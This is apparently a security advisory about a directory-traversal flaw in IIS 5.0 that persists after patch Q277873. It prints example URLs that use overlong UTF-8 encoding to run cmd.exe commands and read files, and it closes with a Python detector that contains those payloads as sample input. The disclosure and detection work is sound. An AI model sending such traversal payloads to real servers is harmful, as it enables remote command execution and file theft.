Installing the Q277873 patch on IIS 5.0 opens a security hole that enables attackers to execute arbitrary commands on the web server. The patch itself was intended to close a vulnerability that allowed execution of arbitrary commands, but it seems that the patch is not sufficient, since the vulnerability still exists.
Credit:
The information has been provided by Georgi Guninski.
Vulnerable systems:
IIS 5.0 with the Q277873 patch applied (the patch actually creates the problem)
Example:
The following URL:
http://www.example.com/scripts/georgi.bat/ ..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/ c%20dir%20C:\
(NOTE: URL has been wrapped for readability)
executes "DIR C:\" (you will be prompted to save the output to a file). It is also possible to read most files using:
http://www.example.com/scripts/georgi.asp/ ..%C1%9C..%C1%9C..%C1%9Ctest.txt
Replacing the scripts directory with the MSADC directory does not change the result; the vulnerability is not affected.
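A detection sketch for the request pattern shown above, added here as an example and not part of the original advisory. `%C1%9C` is an overlong two-byte UTF-8 encoding of the backslash (0x5C), so the check flags percent-decoded paths containing lead bytes 0xC0/0xC1 and reports whether folding them produces `..` segments. The function names and the benign sample paths are constructed for illustration, and the folding step models a lenient decoder as an assumption.

```python
import re
from urllib.parse import unquote_to_bytes

# A two-byte UTF-8 sequence whose lead byte is 0xC0 or 0xC1 is overlong: it
# encodes a code point below 0x80 and is never valid in well-formed UTF-8.
OVERLONG_2BYTE = re.compile(rb"[\xC0\xC1][\x80-\xBF]")

def fold_overlong(raw: bytes) -> bytes:
    """Collapse overlong pairs to the ASCII byte a lenient decoder would yield."""
    def fold(match):
        lead, cont = match.group(0)
        return bytes([((lead & 0x1F) << 6) | (cont & 0x3F)])
    return OVERLONG_2BYTE.sub(fold, raw)

def inspect_target(target: str) -> dict:
    """Classify one request target (path plus optional query string)."""
    raw = unquote_to_bytes(target.split("?", 1)[0])
    hidden = sorted({fold_overlong(seq).decode("ascii")
                     for seq in OVERLONG_2BYTE.findall(raw)})
    segments = fold_overlong(raw).replace(b"\\", b"/").split(b"/")
    return {"overlong": bool(hidden), "hidden_chars": hidden,
            "traversal": b".." in segments}

def scan(targets):
    """Return the targets that carry an overlong sequence or a '..' segment."""
    return [t for t in targets
            if (r := inspect_target(t))["overlong"] or r["traversal"]]

# Constructed sample input: two benign requests plus the two request paths
# from the advisory (line-wrap spaces removed).
SAMPLE_TARGETS = [
    "/scripts/report.asp?id=5",
    "/docs/caf%C3%A9.html",  # valid two-byte UTF-8, must not be flagged
    "/scripts/georgi.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\\",
    "/scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Ctest.txt",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_TARGETS):
        print(hit, inspect_target(hit))
```

Rejecting any request whose decoded path contains an overlong sequence is a stricter rule than looking for `..` alone, because the literal string `..\` never appears in the request as sent.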